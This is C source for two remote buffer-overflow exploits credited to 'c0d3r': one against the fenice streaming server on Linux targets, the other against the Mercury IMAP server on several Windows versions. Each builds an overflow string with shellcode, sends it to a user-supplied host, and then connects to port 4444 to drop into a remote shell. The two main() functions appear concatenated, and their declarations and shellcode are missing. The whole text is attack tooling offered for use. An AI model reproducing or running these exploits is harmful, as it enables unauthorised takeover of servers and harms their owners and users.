int main(int argc,char **argv){
printf("\n-------- fenice - Open Media Streaming Project remote BOF exploit\n");
printf("-------- copyrighted by c0d3r of IHS 2006\n\n");
if(argc != 4)
usage(argv[0]);
os = (unsigned short)atoi(argv[3]);
switch(os){
case 0:
strcat(ret,slack);
printf("[+] Targeting slackware 10.2\n");
break;
case 1:
strcat(ret,FC2_2_6_15);
printf("[+] Targeting fedora core 2 \n");
break;
case 2:
strcat(ret,debug);
printf("[+] Debugging\n");
break;
default:
printf("\n[-] This target doesnt exist in the list\n\n");
exit(-1);
}
printf("[+] Shellcode size : %d bytes\n",sizeof(shellcode)-1);
printf("[+] Building overflow string\n");
// heart of exploit
memset(buffer,inc,size);
memcpy(buffer,get,5);
memcpy(buffer+5+361,ret,4);
memcpy(buffer+5+361+4+10,shellcode,sizeof(shellcode)-1);
buffer[size] = 0;
// EO heart of exploit
hp = gethostbyname(argv[1]);
if (!hp)
addr = inet_addr(argv[1]);
if ((!hp) && (addr == INADDR_NONE) ){
printf("[-] unable to resolve %s\n",argv[1]);
exit(-1);
}
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock){
printf("[-] socket() error...\n");
exit(-1);
}
if (hp != NULL)
memcpy(&(con.sin_addr),hp->h_addr,hp->h_length);
else
con.sin_addr.s_addr = addr;
if (hp)
con.sin_family = hp->h_addrtype;
else
con.sin_family = AF_INET;
port=atoi(argv[2]);
con.sin_port=htons(port);
printf("[+] attacking host %s\n" , argv[1]) ;
sleep(1);
printf("[+] packet size = %d byte\n" , sizeof(buffer));
rc=connect(sock, (struct sockaddr *) &con, sizeof (struct sockaddr_in));
if(!rc){
sleep(1) ;
printf("[+] connected\n") ;
printf("[+] sending the overflow string\n") ;
send(sock,buffer,strlen(buffer),0);
send(sock,"\n",1,0);
sleep(1) ;
send(sock,"\n",1,0);
sleep(1) ;
printf("[+] exploit sent successfully to %s \n" , argv[1]);
printf("[+] trying to get shell\n");
printf("[+] connecting to %s on port 4444\n",argv[1]);
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock){
printf("[-] socket() error...\n");
exit(-1);
}
con.sin_family = AF_INET;
con.sin_port=htons(4444);
rc2=connect(sock, (struct sockaddr *) &con, sizeof (struct sockaddr_in));
if(rc2 != 0) {
printf("[-] exploit probably failed\n");
exit(-1);
}
if(!rc2){
printf("[+] target exploited successfully\n");
printf("[+] Dropping into shell\n\n");
gotshell(sock);
}
}
}
int main (int argc, char *argv[]){
if(argc < 6) {
printf("\n-------- mercury imap remote BOF exploit by c0d3r\n");
printf("-------- usage : imap.exe host port target username password\n");
printf("-------- target 1 : windows xp service pack 1 : 0\n");
printf("-------- target 2 : windows xp service pack 2 : 1\n");
printf("-------- target 3 : windoes 2k advanced server sp 4 : 2\n");
printf("-------- target 4 : windoes 2k3 server enterprise sp0 : 3\n");
printf("-------- target 5 : windoes 2k3 server enterprise sp1 : 4\n");
printf("-------- eg : imap.exe 127.0.0.1 143 0 c0d3r abc\n\n");
exit(-1) ;
}
printf("\n-------- mercury imap remote BOF exploit by c0d3r\n\n");
os = (unsigned short)atoi(argv[3]);
switch(os)
{
case 0:
strcat(point_esp,winxpsp1);
printf("[+] target : windows xp service pack 1\n");
break;
case 1:
strcat(point_esp,winxpsp2);
printf("[+] target : windows xp service pack 2\n");
break;
case 2:
strcat(point_esp,win2ksp4);
printf("[+] target : windows 2000 advanced server service pack 4\n");
break;
case 3:
strcat(point_esp,win2k3_sp0);
printf("[+] target : windows 2003 server enterprise service pack 0\n");
break;
case 4:
strcat(point_esp,win2k3_sp1);
printf("[+] target : windows 2003 server enterprise service pack 1\n");
break;
default:
printf("\n[-] this target doesnt exist in the list\n\n");
exit(-1);
}
printf("[+] building login data\n");
login = malloc(256);
memset(login,0,256);
sprintf(login,"%s %s %s\r\n",req1,argv[4],argv[5]);
// Creating heart of exploit code 4 5
printf("[+] building overflow string");
memset(buffer,NOP,size);
memcpy(buffer+260,point_esp,sizeof(point_esp)-1);
memcpy(buffer+280,shellcode,sizeof(shellcode)-1);
buffer[size] = 0;
exploit = malloc(1000);
memset(exploit,0,1000);
sprintf(exploit,"%s %s %s\r\n",req2,vuln_command,buffer);
// EO heart of exploit code
if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
printf("[-] WSAStartup failed !\n");
exit(-1);
}
hp = gethostbyname(argv[1]);
Sleep(1500);
if (!hp){
addr = inet_addr(argv[1]);
}
if ((!hp) && (addr == INADDR_NONE) ){
printf("[-] unable to resolve %s\n",argv[1]);
exit(-1);
}
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock){
printf("[-] socket() error...\n");
exit(-1);
}
if (hp != NULL)
memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
else
tcp.sin_addr.s_addr = addr;
if (hp)
tcp.sin_family = hp->h_addrtype;
else
tcp.sin_family = AF_INET;
port=atoi(argv[2]);
tcp.sin_port=htons(port);
printf("\n[+] attacking host %s\n" , argv[1]) ;
Sleep(1000);
printf("[+] packet size = %d byte\n" , sizeof(buffer));
rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
if(rc==0)
{
Sleep(1500) ;
printf("[+] connected\n") ;
printf("[+] sending login info\n") ;
send(sock,login,strlen(login),0);
Sleep(1500);
printf("[+] sending exploit string\n") ;
send(sock,exploit,strlen(exploit),0);
Sleep(1500);
printf("[+] exploit sent successfully to %s \n" , argv[1]);
printf("[+] trying to get shell\n");
printf("[+] connecting to %s on port 4444\n",argv[1]);
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
Sleep(1500);
if (!sock){
printf("[-] socket() error...\n");
exit(-1);
}
tcp.sin_family = AF_INET;
tcp.sin_port=htons(4444);
rc2=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
if(rc2 != 0) {
printf("[-] exploit probably failed\n");
exit(-1);
}
if(rc2==0)
{
printf("[+] target exploited successfully\n");
printf("[+] Dropping into shell\n\n");
gotshell(sock);
}
}
else {
printf("[-] ouch! Server is not listening .... \n");
}
shutdown(sock,1);
closesocket(sock);
}
